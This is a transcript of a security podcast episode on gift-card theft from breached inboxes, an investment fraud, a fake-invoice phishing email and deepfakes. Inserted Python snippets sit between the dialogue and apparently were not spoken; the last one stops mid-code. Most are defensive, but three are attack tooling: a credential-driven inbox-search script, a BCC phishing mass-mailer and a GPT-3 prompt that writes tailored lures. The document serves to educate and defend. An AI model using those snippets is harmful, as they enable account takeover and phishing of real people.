Sometimes, deepfake victims don't want to be convinced it is fake.
Etay Maor: A lot of times the victims, so to speak, don't want to be convinced that it's fake.
Dave Bittner: Hello, everyone, and welcome to the CyberWire's "Hacking Humans" podcast, where each week, we look behind the social engineering scams, the phishing schemes and criminal exploits that are making headlines and taking a heavy toll on organizations around the world. I'm Dave Bittner from the CyberWire, and joining me is Joe Carrigan from the Johns Hopkins University Information Security Institute. Hello, Joe.
Joe Carrigan: Hi, Dave.
Dave Bittner: Got some good stories to share this week and, later in the show, my conversation with Etay Maor. He is from Cato Networks, and we're going to be discussing the potential impact that deepfakes may have on our society.
Dave Bittner: All right. Joe, before we dig into our stories this week, we got some feedback on our story about the lightning rod edit.
Joe Carrigan: Right.
Dave Bittner: Evidently, this is a much more broadly used technique than I had previously considered. It...
(LAUGHTER)
Dave Bittner: So not a new idea.
Joe Carrigan: Really.
Dave Bittner: Well, we got several people who wrote in and basically shared their personal stories about how they had done exactly the same thing. So it seems as though this is a pretty common type of thing that people have learned to take advantage of in their professional lives. Not surprisingly, I guess, but nice to see that other people appreciated the telling of the tale and it resonated with them as well.
Joe Carrigan: Right.
Dave Bittner: Yeah. So thanks to everyone who wrote in about that. Several people shared their stories, and unfortunately, we don't have time to share them all. But we do appreciate you sending them in. All right. Well, let's move on to our stories this week. I'm going to start things off for us. My story comes from KrebsOnSecurity, and it's titled, "Gift Card Gang Extracts Cash From 100,000 Inboxes Daily."
Joe Carrigan: Really.
Dave Bittner: Yeah (laughter). So...
Joe Carrigan: That's a lot of emails to check, Dave.
Dave Bittner: It's a lot of emails to check. So this is a story written by Brian Krebs over at KrebsOnSecurity, and he's describing what he says is a successful and lucrative online scam which employs a low-and-slow approach. And what these folks do is they attempt to log into tens of thousands of email inboxes a day. And Brian Krebs is working with someone who is a cybersecurity professional who has sort of an inside view on email servers.
Joe Carrigan: OK.
Dave Bittner: And so this person has a window on tracking these sorts of things, right?
Joe Carrigan: Right.
Dave Bittner: So these folks are attempting to log in to between 50,000 and 100,000 inboxes a day.
Joe Carrigan: I'm going to bet that's automated.
Dave Bittner: It is?
(LAUGHTER)
Dave Bittner: Right. It's one guy, and, boy, is his...
(LAUGHTER)
Joe Carrigan: Are his fingers sore.
Dave Bittner: Yeah. Yeah. It was a major upgrade when he got himself a Walkman.
Joe Carrigan: Right (laughter).
Dave Bittner: So - and they're getting their credentials probably from the big credential breaches.
Joe Carrigan: Sure.
Dave Bittner: Right? But instead of going in and, you know, wreaking havoc with these email accounts, when they get in, they get into an email account, and they start searching. And what do you suppose they're searching for, Joe?
Joe Carrigan: Well, judging from the title of this article, I'm going to say gift cards.
Dave Bittner: Nothing gets by you, Joe.
Joe Carrigan: Right.
Dave Bittner: That is correct. That's absolutely correct. They are searching for gift card data. Once they've established access to someone's email account, they'll log in a few times a month - again, an automated process - and they're looking for links to gift cards.
Joe Carrigan: Really.
Dave Bittner: Links to - what do you call it? - mileage. You know - your mileage points from your airline.
Joe Carrigan: I see.
Dave Bittner: Links to hotel rewards, things like that - because many of these things we receive via email.
Joe Carrigan: Right.
Dave Bittner: I'm - certainly I've received gift cards from friends.
Joe Carrigan: Sure.
Dave Bittner: Hey, happy birthday. Here's a $50 Amazon gift card.
Joe Carrigan: I've received that as well and sent them.
Dave Bittner: Yeah. Yeah. Another point they make here is that sometimes employers, with their health insurance, will have rewards programs where they will say, you know, if you agree to walk around the block every day for a month, you'll get a $5 gift card - right? - $5 Starbucks gift card or something like that or an Amazon gift card.
Joe Carrigan: Sounds like a lot of work for five bucks...
Dave Bittner: It does (laughter). But these folks, these bad guys, have figured out - they've also built some automation to enroll their victims in those programs and automatically get the rewards.
Joe Carrigan: Really?
Dave Bittner: Yeah. Yeah. So they go in and they search for these sorts of rewards, and then they sell them online. And they - this article points out that gift cards are very easy to sell online. They typically get about 80% of the value of the gift card - so quite lucrative.
Joe Carrigan: Great way to launder money.
Dave Bittner: It is a great way to launder money.
Joe Carrigan: Well, actually, I shouldn't say that because, as I've said before, it's really a great way to move money around - that's what I should say.
Dave Bittner: Yeah. Yeah. Yeah. But I think it is a pretty common way to launder money. I mean, this is sort of getting off on a tangent here, but being able to go into your local grocery store and buy up a bunch of prepaid cash cards - that is a way to shift money from one form to another that bad guys take advantage of a lot.
Joe Carrigan: Indeed.
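To make the mechanics concrete: the kind of automated, low-and-slow inbox search Krebs describes can be done with nothing more than a scripting language's standard mail library. Here is a rough sketch using Python's imaplib - the host, credentials, and search terms are all hypothetical, an illustration of the technique rather than anyone's actual tooling.

```python
import imaplib

# All names here are hypothetical; credentials like these come from breach dumps.
HOST, USER, PASSWORD = "imap.example.com", "victim@example.com", "hunter2"
SEARCH_TERMS = ["gift card", "egift", "reward points", "miles"]

conn = imaplib.IMAP4_SSL(HOST)
conn.login(USER, PASSWORD)
conn.select("INBOX", readonly=True)  # read-only leaves messages marked unread

for term in SEARCH_TERMS:
    # IMAP TEXT search matches both headers and message bodies
    status, data = conn.search(None, "TEXT", f'"{term}"')
    if status == "OK" and data[0]:
        print(f"{term}: {len(data[0].split())} matching messages")

conn.logout()
```

Run against a list of breached credentials only a few times a month per account, a loop like this stays under most rate-limiting radars - which is exactly the low-and-slow pattern described above.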
Dave Bittner: So this - a couple of things here. I mean, the obvious way around this is to beef up your security in your email account - two-factor, right?
Joe Carrigan: Right. Absolutely. Two-factor authentication does wonders here - these guys can't automate this with two-factor authentication.
Dave Bittner: Right. Right.
Joe Carrigan: And that makes it difficult to do at scale, if not impossible.
Dave Bittner: Yeah. If you don't have two-factor on your primary email account, what the heck are you waiting for?
Joe Carrigan: Right. Do it now.
Dave Bittner: I mean, I don't know how many times we can bang that drum. We're past the point where skipping it is acceptable - it just has to be a standard thing. There are too many things coming through your primary email account to not put that additional layer of security on it.
Joe Carrigan: Yeah. Your email account is essentially the root of your identity online.
Dave Bittner: That's right.
Joe Carrigan: And I've said here before that email is terrible because it allows anybody to put something in there, which makes it a very vulnerable route to all of your identity online. So the best way to protect yourself here is multi-factor authentication, particularly with a hardware key.
Dave Bittner: Yeah.
Joe Carrigan: That will stop, like, almost 100% of these things.
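For a sense of why a second factor breaks this automation: with time-based one-time passwords (the common app-based factor; hardware keys use a stronger challenge-response flow), a stolen password alone is useless without a fresh code derived from a per-account secret the attacker never saw. A minimal sketch of the RFC 6238 algorithm, using only Python's standard library:

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
    """Compute the current RFC 6238 time-based one-time password."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // period          # 30-second time step
    msg = struct.pack(">Q", counter)              # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                    # RFC 4226 dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# The server does the same computation on its copy of the secret. A breached
# password list never contains that secret, so bulk login attempts fail here.
print(totp("JBSWY3DPEHPK3PXP"))  # example secret common in TOTP demos
```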
Dave Bittner: So this article made me ponder something that I'm curious for your opinion on here, Joe.
Joe Carrigan: OK.
Dave Bittner: And that is they're talking about credentials for things like Gmail and Microsoft Office 365.
Joe Carrigan: Right.
Dave Bittner: This got me thinking that one of the things we talk about all the time here is that you should not reuse credentials.
Joe Carrigan: Yes.
Dave Bittner: Right?
Joe Carrigan: Right.
Dave Bittner: But think about a service like Gmail or a service like Office 365, where one login is your email. It's your documents.
Joe Carrigan: Right.
Dave Bittner: Right? It could be your chat.
Joe Carrigan: Oh, yeah.
Dave Bittner: It could be your video conferencing. It could be - I mean, there are many, many things that fall under this.
Joe Carrigan: Yeah. Whether you're using Skype, Teams or Hangouts.
Dave Bittner: Right.
Joe Carrigan: Yeah. It's all included with these big tech companies. Right.
Dave Bittner: Right. So isn't that, in effect, kind of reusing a password for multiple services?
Joe Carrigan: I don't know that I'd say that. I think it makes that username and password pair much more valuable.
Dave Bittner: Yeah.
Joe Carrigan: Right? And if you're using that same username and password pair on other sites, that's what makes it vulnerable. But these large companies, while they may not do a great job at privacy, generally do a pretty good job at security. And there is a distinction there. I think Microsoft does a pretty good job with privacy, but, you know, Google - we all know what Google is up to. Amazon is the same way.
Dave Bittner: (Laughter) Right.
Joe Carrigan: You know, they make money selling ads and selling us stuff.
Dave Bittner: Yeah.
Joe Carrigan: So - whereas Microsoft makes money selling us hardware and software services. And the same with Apple - Apple makes their money selling hardware and software services.
Dave Bittner: Right.
Joe Carrigan: So their business model lends itself to more privacy. But I digress. Your question was about whether or not this essentially amounts to password reuse. I don't think so. I wouldn't say that.
Dave Bittner: Yeah.
Joe Carrigan: The problem is reusing that same password on, like, Netflix or on some website where you have no idea what those people do - say, a message board for one of your hobbies. When you go on there, don't use the same password that you use for your email accounts, because you have absolutely no idea how that site secures passwords. Your password could just be stored in plain text in the database behind it. So if someone gets access to that database, they don't even need to crack your password.
Dave Bittner: Right.
Joe Carrigan: They have it. I can guarantee you that Microsoft, Google, Amazon, Apple - none of those guys store your passwords in plain text.
Dave Bittner: Right. Right.
Joe Carrigan: They all use, you know, hashes - and good hashes at that.
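"Good hashes" here means slow, salted, one-way functions - not a bare SHA-256 of the password. A minimal sketch of the idea with Python's standard library (the iteration count is illustrative; real services tune it, or use dedicated algorithms like bcrypt, scrypt, or Argon2):

```python
import hashlib, hmac, os

def hash_password(password: str, salt: bytes = None) -> tuple:
    """Store (salt, digest) per account; the password itself is never kept."""
    salt = salt or os.urandom(16)        # a unique salt defeats rainbow tables
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    # compare in constant time to avoid leaking information via timing
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
```

The 600,000 rounds of PBKDF2 are what make a stolen database expensive to crack: each guess costs the attacker the same slow computation.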
Dave Bittner: Well, I mean, maybe a different direction to come at this, then, is to say that because one password gives you access to so many different things that are important to you under these umbrellas, all the more reason to have that second factor.
Joe Carrigan: Yes - and to have a good strong password as well. Unique, strong password - use a password manager. And if you're only going to do one thing, use multi-factor authentication.
Dave Bittner: Yeah. Another thing I was curious about - I wonder, is there a way to have some sort of detection on your email account if particular searches are taking place? I don't know the answer to that. I can't think of an easy way to do that.
Joe Carrigan: Well, I mean, it depends on the application, right? If it's a web application, there is a way to do it programmatically. But does that feature exist in the software? That's really the question.
Dave Bittner: Right.
Joe Carrigan: I don't know the answer to that. But yes, you could absolutely do that. Well, Microsoft or Google could absolutely do that.
Dave Bittner: Yeah. Yeah. Well, in this Krebs article, they provide indicators of compromise for the ISPs themselves.
Joe Carrigan: OK.
Dave Bittner: So they could automate looking for this sort of thing.
Joe Carrigan: Right.
Dave Bittner: But I don't know. It got me thinking, I can't think of a way, within my own email client - either, you know, one running on my computer or my mobile device or a web-based one - of putting into place some sort of automated detection if a particular search takes place.
Joe Carrigan: I will say this. If they are using some kind of mail client that downloads your email, then there's really no way to detect the search.
Dave Bittner: Yeah.
Joe Carrigan: All you can detect is the access. Like, I don't even know if Thunderbird is still a thing, but if they're using something like Thunderbird, they could just use the client to search through all your stuff locally, and you would have no cognizance of that. But if they're using the web interface, the search has to be submitted back to the server.
Dave Bittner: Right.
Joe Carrigan: So, like, when you go through your Gmail and you type, you know, I'm looking for something from my buddy Peter - see what Peter sent me last - that would be trackable.
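On the provider side, a crude version of that detection could be a pass over webmail search logs for the kinds of terms this gang hunts for. The log format and field names below are invented for illustration; Krebs's article supplies the real indicators of compromise for providers.

```python
import json

# Keywords drawn from the kinds of searches described in the article.
SUSPECT_TERMS = {"gift card", "egift", "voucher", "rewards", "miles"}

def flag_suspicious_searches(log_lines):
    """Yield (account, query) pairs whose webmail searches look like
    gift-card hunting. Expects one JSON record per line (hypothetical format)."""
    for line in log_lines:
        event = json.loads(line)
        query = event.get("query", "").lower()
        if any(term in query for term in SUSPECT_TERMS):
            yield event["account"], query

sample_log = ['{"account": "alice@example.com", "query": "Amazon gift card"}']
for account, query in flag_suspicious_searches(sample_log):
    print(account, "searched:", query)
```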
Dave Bittner: All right. Well, interesting article here. Again, it's from Brian Krebs over at KrebsOnSecurity. We will have a link to that in the show notes. Joe, what do you have for us this week?
Joe Carrigan: Dave, renewable energy is all the rage these days, is it not?
Dave Bittner: It is. It is.
Joe Carrigan: And what would you say is one of the biggest, probably most reliable or most in-development forms of renewable energy right now?
Dave Bittner: Oh, that's a good question. I would say - I want to say either solar or wind turbines.
Joe Carrigan: Wind turbines. That's where we're going today.
Dave Bittner: OK.
Joe Carrigan: So there is a story from MarketWatch about some Arkansas wind-energy entrepreneurs who claimed their technology was more efficient than current wind turbines, and they managed to get $700,000 out of people as investors.
Dave Bittner: OK.
Joe Carrigan: And these investments ranged in size from $13,000 up to, I think, $300,000.
Dave Bittner: Wow.
Joe Carrigan: So there were some people that were really, really hurt by this. These two guys have now been convicted of various crimes, including wire fraud and money laundering. Their names are Jody Davis and Phillip Vincent Ridings. They claimed to be inventors of this turbine. They started a company called Dragonfly Industries International, and they said, we have this really cool new wind turbine. The Department of Defense is looking at it. We have a bunch of different places all over the world where they're looking to build it. And they used doctored reports from nationally recognized engineering firms. So...
Dave Bittner: Oh, interesting.
Joe Carrigan: They took these reports, and they faked them. And that's how they showed people, look, our wind turbines generate more electricity than current wind turbines. We're going to make millions.
Dave Bittner: So just run-of-the-mill fraud there.
Joe Carrigan: Right. Exactly.
Dave Bittner: Yeah. Yeah.
Joe Carrigan: Now, what I find interesting about this is there's another story about the same set of events over at the Northwest Arkansas Democrat-Gazette. The website is nwaonline.com. I would have thought that was something else.
Dave Bittner: For the rap group.
Joe Carrigan: Yes.
Dave Bittner: Right.
Joe Carrigan: So that's where my mind goes immediately.
Dave Bittner: (Laughter) Right. Yeah.
Joe Carrigan: I'm thinking "Straight Outta Compton." No. No. This is the Northwest Arkansas Democrat-Gazette.
Dave Bittner: I bet they get that a lot. They get a lot of disappointed visitors to their website.
Joe Carrigan: But it turns out that prison and religion played a big role in this scam. Right? Jody Davis was serving time in a federal prison in Texas for a fraud conviction in Oklahoma, and he befriended this guy - let's just call him Mr. O. I don't want to embarrass him; his name is in the report. He befriended him through the prison ministries. So when they were both out, Davis convinced Mr. O that he had this new wind turbine technology and turned around and scammed one of his own friends from the prison ministry out of many thousands of dollars.
Dave Bittner: No honor among thieves.
Joe Carrigan: Right. Well, I just wanted to bring this story up, that - I talk about tribalism from time to time on this show.
Dave Bittner: Yeah.
Joe Carrigan: Right?
Dave Bittner: Yeah.
Joe Carrigan: How the divisiveness of tribalism is bad for us. By the same token, the unity of tribalism is also very exploitable. Right? And when somebody approaches you and they say, hey, we were in the same - we go to the same church. We're a member of the same religious community.
Dave Bittner: Right. Right. This person says, I'm a good Christian or I'm a good Jew or whatever it may be.
Joe Carrigan: Yeah. Yeah. Yeah. Yeah.
Dave Bittner: Exactly. Exactly.
Joe Carrigan: When somebody approaches me and starts saying that - and this is probably just my suspicious nature - I am immediately put off by it. Right? You know, my business ventures are not dependent on whether or not you're of a particular religion or of the same religion as me. If I'm going to have business ventures with you, I want to see what your business plan is. I want to see what your technology is. I don't really care about your religion. But for some people, it's very important, and that importance can be exploited, as it was here. This guy, Mr. O, actually went out and vouched for Davis and his partner and wound up getting more people involved in this.
Dave Bittner: I see.
Joe Carrigan: So there's a quote in the article that says, Jody Davis was one of our Christian brothers, so I never doubted or thought that something was being done. And the money is all gone. These guys spent it on things like down payments for houses. They bought fancy cars and even took a trip to Disney World. So...
Dave Bittner: (Laughter) Wow.
Joe Carrigan: These people are essentially out all of their money.
Dave Bittner: I mean, I think this is a really interesting point that you make here, and I'm trying to think for myself - do you think there's anything in your own life where you would be predisposed to give someone the benefit of the doubt because they're in the same group as you, or something like that?
Joe Carrigan: That's a good question. You know, my initial response is, oh, no way, Dave, I'm too smart for that.
Dave Bittner: Right. Well, exactly.
Joe Carrigan: But there probably is, isn't there?
Dave Bittner: Yeah. It's your church or your - you know, I mean, your neighborhood association, your college, your...
Joe Carrigan: See; you know...
Dave Bittner: ...What kind of music you listen to. There's so many things that we're - we group ourselves into.
Joe Carrigan: Yeah, exactly. Some of the music I listen to - I wouldn't trust any of those people.
(LAUGHTER)
Dave Bittner: Right. Honestly, Joe, I've heard some of the music you listen to.
Joe Carrigan: Right.
Dave Bittner: And I don't really trust you myself. So...
Joe Carrigan: Right. Exactly.
Dave Bittner: (Laughter).
Joe Carrigan: You know, my neighborhood association - I don't know. I know where those people live.
Dave Bittner: Yeah.
Joe Carrigan: So...
Dave Bittner: Yeah, exactly.
Joe Carrigan: That's a big difference. So I'm more likely to trust my neighbors. But, you know, I have an existing relationship with them. But that's what this guy had with Jody Davis.
Dave Bittner: Right.
Joe Carrigan: He had an existing relationship with him, and that got exploited.
Dave Bittner: Yeah. But also, I think part of this is if someone that you have a pre-existing relationship and pre-existing trust with...
Joe Carrigan: Right.
Dave Bittner: If that person comes to you and says, I'm vouching for this other person, that can short-circuit your own skepticism...
Joe Carrigan: Right.
Dave Bittner: ...Because you'll transfer that trust you have in the first person to the second person...
Joe Carrigan: Exactly.
Dave Bittner: ...Whether or not it's justified.
Joe Carrigan: Yeah, yeah.
Dave Bittner: And so it's something to be wary of.
Joe Carrigan: Right. Now, I can think of several people who live in my neighborhood who I think are smart people...
Dave Bittner: Yeah.
Joe Carrigan: ...Who, if they said, hey, Joe; we got an investment opportunity, I'd be like, oh, hey; I'm interested. You're a smart person.
Dave Bittner: Right, right. Yeah. Well, and also, I think it's important to recognize that knowledge, expertise and skill in one area does not necessarily transfer to other areas.
Joe Carrigan: Yeah, absolutely.
Dave Bittner: You may be a brilliant brain surgeon, but that doesn't mean you know anything about investments.
Joe Carrigan: Right. Yeah.
Dave Bittner: Yeah, yeah. All right. Boy, that's an interesting one. I'm going to be thinking about that one for a while. Yeah. All right. Well, we'll have a link to all of our stories in the show notes. But, Joe, it is time to move on to our Catch of the Day.
(SOUNDBITE OF REELING IN FISHING LINE)
Joe Carrigan: Dave, our Catch of the Day comes from a listener who did not leave a name.
Dave Bittner: OK.
Joe Carrigan: They write, (reading) hi, Dave. Hi, Joe. I just received this email that could be a potential Catch of the Day. It's supposed to be an invoice for an iPhone XS Max 128 gigabyte chili.
Joe Carrigan: You know what that means, Dave - the chili?
Dave Bittner: I don't know what the chili part means, no.
Joe Carrigan: Is that the color, maybe?
Dave Bittner: Not that I know of, and I'm pretty steeped in this stuff. But maybe I'm missing something. I don't know. Who knows?
Joe Carrigan: (Reading) The subject of the email was, thank you for purchasing an iPhone XS Max 128 gigabyte chili. I never bought one of these, and my first thought was, who's trying to scam me?
Joe Carrigan: Well, this person is a listener to our show, obviously.
Dave Bittner: (Laughter) Right.
Joe Carrigan: A very smart listener. Instead of, how do I get my money back, which is good...
Dave Bittner: Yeah.
Joe Carrigan: ...I'm glad that's your first thought here.
Dave Bittner: Yeah.
Joe Carrigan: (Reading) The email comes from a Gmail account. Also, I was on the BCC line.
Joe Carrigan: That's interesting.
Dave Bittner: Oh.
Joe Carrigan: Not the to line or the CC line.
Dave Bittner: Yeah.
Joe Carrigan: (Reading) Have fun with this one.
Joe Carrigan: Now, the BCC line - that's blind carbon copy. You can put a whole list of, like, a million people in the BCC line, and it will look like that email was sent to one person.
Dave Bittner: Right.
Joe Carrigan: And...
Dave Bittner: Right.
Joe Carrigan: ...You won't know to whom else it was sent.
Dave Bittner: Right - another red flag.
Joe Carrigan: Yes.
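A quick aside on why the BCC trick works: blind-carbon-copy addresses travel in the SMTP envelope, not in the message headers, so each target sees only what the sender chose to show. A minimal sketch using Python's standard library - the server, sender, and recipients are all hypothetical:

```python
import smtplib
from email.message import EmailMessage

msg = EmailMessage()
msg["From"] = "accounts@example.com"      # hypothetical sender
msg["To"] = "undisclosed-recipients:;"    # the only recipient header victims see
msg["Subject"] = "Thank you for purchasing iPhone XS Max"
msg.set_content("Your order has been processed...")

# The real recipient list travels only in the SMTP envelope, never in a header,
# which is why each target appears to have been blind-copied.
bcc_list = [f"victim{n}@example.com" for n in range(1000)]  # sent in batches

with smtplib.SMTP("smtp.example.com") as server:
    server.send_message(msg, to_addrs=bcc_list)
```

Because `to_addrs` overrides the headers entirely, the same innocuous-looking message lands in every inbox with no trace of the other recipients.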
Dave Bittner: Yeah. All right. So this one reads like this. The subject is, (reading) thank you for purchasing iPhone XS Max 128 gigabyte chili. Dear unique buyer, I very thank you for purchasing iPhone XS Max 128 gigabyte chili from Telepay International (ph) on PayPal. Your order have been successfully processed and dispatched for shipment. Product details - invoice number product iPhone XS Max 256 gigabyte chili.
Dave Bittner: There's a discrepancy. (Reading) Order date 03-09-21, expected delivery date 04-09-2021, value 999 98 cent U.S. dollar, payment method auto debit. For any quire or concern regarding your purchase or wanted to make any changes regarding delivery address, feel free to contact our accounts department and express your issues, including purchases and cancellations of the order. You can reach us at this phone number. Regards, accounts department.
Joe Carrigan: So I think this is another scam where they try to get you to call in, and then they try to either get you to cough up your credit card details or maybe get you to open up a remote connection to your computer...
Dave Bittner: Yeah.
Joe Carrigan: ...And say, we got to make sure - we got to log in to your bank and make sure this is the case. And...
Dave Bittner: Right.
Joe Carrigan: Who knows?
Dave Bittner: I'm curious - so a couple things that draw my attention here. First of all, the text of the email mentions 128 gigabyte phone. The product listed here is a 256 gigabyte phone.
Joe Carrigan: Yep.
Dave Bittner: So there's a discrepancy.
Joe Carrigan: Very sloppy.
Dave Bittner: Yeah. I'm interested in the fact that they place the value at $999.98.
Joe Carrigan: Well, you got a one penny discount, Dave.
Dave Bittner: Well - but I was thinking, first of all, this is a $1,200 phone.
Joe Carrigan: Oh, OK. All right.
Dave Bittner: But that's not my primary interest here. What I'm curious is, do we think there's any psychological reason why they're keeping that number below $1,000?
Joe Carrigan: That's a good question.
Dave Bittner: Yeah.
Joe Carrigan: Maybe.
Dave Bittner: I don't know. Maybe one of our listeners knows. I mean, obviously, there's that whole thing in pricing where you make something $99.99 instead of $100.
Joe Carrigan: Right.
Dave Bittner: And people are more likely to buy it.
Joe Carrigan: Right.
Dave Bittner: Yeah. But I don't know if this relates to that or not. Is there a subtle psychological pull of keeping it under a thousand dollars?
Joe Carrigan: I don't know.
Dave Bittner: Interesting question.
Joe Carrigan: It is.
Dave Bittner: Yeah.
Joe Carrigan: It would be interesting to see the effectiveness of other phishing emails that have prices over a thousand dollars.
Dave Bittner: Yeah. Well, we know these folks iterate, right?
Joe Carrigan: Yep, they do. That's right.
Dave Bittner: (Laughter) There's no cost for sending out 100,000 emails, so...
Joe Carrigan: (Laughter) That's exactly right.
Dave Bittner: They iterate.
Joe Carrigan: It's practically free, Dave.
Dave Bittner: Yeah. All right. Well, thanks to our listener for sending that in. We do appreciate it. We would love to hear from you. If you have a Catch of the Day for us, you can send it to us. It's hackinghumans@thecyberwire.com.
Dave Bittner: All right, Joe. I recently had the pleasure of speaking with Etay Maor from Cato Networks. And our conversation centers on this notion that deepfakes are here to stay, and we wonder what impact they might have on our society. Here's my conversation with Etay Maor.
Etay Maor: I think we're finding ourselves at an interesting point in time because deepfakes are already out there. They're already being used. They're not, I would say, something that is considered as widespread as, say, phishing or malware. But I think at the same time, there's a reason the FBI issued a warning that deepfake attacks are imminent in the next 12 to 18 months. The technology is moving really fast, making very sophisticated videos much more accessible than they were before.
Dave Bittner: You know, I think over the past year or so, maybe a little more than that, we've been seeing a lot of technology demonstrations of this. There was one that made the rounds where someone had replaced themselves with a picture of Tom Cruise, and it was very convincing. And I've seen things recently where they could start using this technology for things like dubbing foreign films so that, for the first time, the lips will match what the dubbed dialogue is saying. So I think we're getting more accustomed to the idea that this is coming. But the notion that it's available to the bad guys - I think that's something that a lot of us are still getting used to.
Etay Maor: Yeah. I mean, deepfakes in their different variations - and you mentioned a couple of them - have been around for a while, right? Face-swapping games - like, changing faces of people - I've done that with my kids for, you know, five years now. But what we're seeing now is that these are becoming much more sophisticated and much easier to access. So you don't really need, for example, programming knowledge in order to run some of these deepfakes or to create them - not to mention the fact that, you know, if you're only dealing with voice synthesis, then it becomes even easier.
Etay Maor: And yes, the bad guys do have them. And it's an interesting point because who is the bad guy? I have seen attacks using deepfakes, right? There was this case not too long ago of a mother who used a deepfake with a cheerleading team. There was a whole issue there where they created a fake video. So it's becoming, you know, much more accessible to everybody. And I have zero doubt that this is going to be used in the very near future for political issues and for creating tensions between different adversarial, or not adversarial yet, countries, if that makes sense.
Dave Bittner: Can you give us some examples of where you've seen this being used?
Etay Maor: Yes. So there was a case, for example - not targeting a bank, but targeting a company - where it was used pretty similarly to what are called BEC, business email compromise, attacks, where somebody takes control of a manager's email and sends requests for money transfers on their behalf. It was used in the same way with voice. Somebody synthesized a deepfake of a manager's voice and created a message asking another person to move money out of certain accounts. So we've already seen that. I think there was $200,000 or $300,000 lost there.
Etay Maor: We have seen a lot of different deepfake potentials in the making, like I said. There was the case that I just mentioned. And there was also a case in the Netherlands, I think about a month or so ago, where somebody created a deepfake video and shared it with the parliament over in the Netherlands. So we've already seen some usages of it.
Etay Maor: Also, due to this technology, we are now faced with something called the liar's dividend, where the mere fact that the technology exists can be used without using the technology - which doesn't seem to make sense, but let me give you an example. Now you will have situations where, let's say, somebody was caught on video leaving a building, whatever the situation was. He can claim, that wasn't me on the video; that was a deepfake of me. So the fact that deepfakes are out there can be used by people who actually committed a crime, or did something that they didn't want other people to know about, to say, no, no, that wasn't me. Somebody faked that video. I swear to you, it wasn't me.
Dave Bittner: (Laughter).
Etay Maor: And that's called the liar's dividend. And that's - you know, that's another distortion of reality. So what can I believe? How can I believe this?
Dave Bittner: Right. Right. Who are you going to believe, me or your lying eyes, right (laughter)?
Etay Maor: And can I add another level of sophistication now just to that?
Dave Bittner: Please. Please.
Etay Maor: So there's something called GPT-3, which is an artificial intelligence engine that has - don't quote me on the number - I think 175 billion parameters in its neural network. And it has terabytes of information that it consumed, and it can generate articles based on this information. And scientists are having a hard time telling the difference between a human-written article and a machine-written article that was generated using GPT-3. And it's not only that - it can also answer questions on that topic, which is amazing for really good things, right? Science, medicine, stuff like that. But I've seen some freaky things with it. I've seen somebody use a very simple deepfake with the GPT engine behind it, and he was having a conversation with the computer. And the computer was answering questions in a very logical sense.
Etay Maor: At some point, they got into, like, does it have feelings? Is it aware of itself? So it got really interesting. But the fact that you can now put an engine like this behind a deepfake - potentially, you're fully automating everything. You don't even need the human intervention in the middle. Think about it. You can say, for example, to GPT, hey, Etay is interesting - I'm not, but let's say Etay is interesting. Let's get everything he did on his social networks, and let's see, what is the best way to open a conversation with him? And let GPT decide that. And then, perhaps, even put a deepfake behind it.
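To give a flavor of how little glue code that automation needs: at the time of this episode, OpenAI sold access to GPT-3 through a hosted completions API. The sketch below is illustrative only - the prompt is invented, and the endpoint and model name reflect one version of the API and may differ from what OpenAI currently offers.

```python
import requests

API_KEY = "sk-..."  # an OpenAI API key; paid access, but open to sign-ups

# A prompt built from a target's public posts, as Etay describes.
prompt = (
    "Public posts by the target:\n"
    "- 'Great ride on the trail this morning!'\n"
    "- 'Anyone else going to the security meetup Thursday?'\n"
    "Write a friendly, personalized opening message to this person:"
)

resp = requests.post(
    "https://api.openai.com/v1/completions",
    headers={"Authorization": f"Bearer {API_KEY}"},
    json={"model": "davinci", "prompt": prompt, "max_tokens": 60},
    timeout=30,
)
print(resp.json()["choices"][0]["text"])  # a tailored conversation opener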
Dave Bittner: I can think of, you know, folks who are in the public eye - celebrities, politicians, podcast hosts...
(LAUGHTER)
Dave Bittner: ...Where there's a large library of information available about them, but also hours and hours of recordings that could be ingested and used to, as you say, generate both the visual and the audio of the deepfake, but also the logic behind it - you know, I could imagine it answering questions in the way that the celebrity would.
Etay Maor: Exactly. I mean, for voice synthesis, you don't need more than five minutes. Everybody has more than five minutes of audio somewhere. And if not, you know, an attacker can potentially call somebody up - hey, I have a poll; just answer these questions and you get $100, whatever. You can socially engineer somebody into talking to you for five minutes. That's not a problem. And then you get some high-resolution photos of them, especially with certain mouth movements - when you can see the teeth, when you can see the tongue, different lip positions. Yeah. I don't like to spread FUD - you know, fear, uncertainty and doubt - and be the doomsayer.
Dave Bittner: Yeah.
Etay Maor: But again, there's a reason that the FBI is warning that these attacks are imminent. The technology is moving so fast. And the technology to detect it is also getting there, but it's not keeping pace. There are some very interesting things out there, like FakeNetAI, which I talked to in the past - they're doing this kind of, hey, let's be able to detect these types of deepfake videos. But really, three years ago, I wouldn't have thought that we'd be at this point in time, with deepfakes so sophisticated, so convincing and so easily accessible.
Dave Bittner: Well, then what is to be done here? I mean, I've heard people talk about the possibility of, for example, for news reporting, having some sort of chain of custody. You know, dare I invoke the blockchain? But, you know, having some way to verify that this video, this audio, whatever it may be, has been through a verified chain of custody throughout its life. Are those possible approaches we could take?
Etay Maor: Yes. But before I even go into that - first of all, we all need to be aware that these things are out there, their level of sophistication, who holds this technology and can access it, and what can be done with it. We have to be aware that there may be things out there that we shouldn't trust. Once we have that in place, then yes, we will need to use technology and human verification to identify whether these things are fake or not. The chain of custody you mentioned is an interesting approach. Another way is, like I said, video and audio analysis. You can search for certain glitches. For example, in AI-created pictures, you can see glitches - here's a tip - usually around the ears or in the hair. There are also glitches that can happen in videos like this when you try to force somebody's lips a certain way if you don't have a very good sample.
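Production deepfake detectors are trained models, but the basic shape of the analysis - walk a video frame by frame and score each frame for visual inconsistencies - can be sketched simply. The blur statistic below is a toy stand-in for the learned artifact detectors Etay describes, assuming OpenCV (`cv2`) is installed; the input filename is hypothetical.

```python
import cv2

def frame_scores(video_path: str) -> list:
    """Toy per-frame cue: variance of the Laplacian (a sharpness measure).
    Abrupt swings between neighboring frames can hint at manipulated regions;
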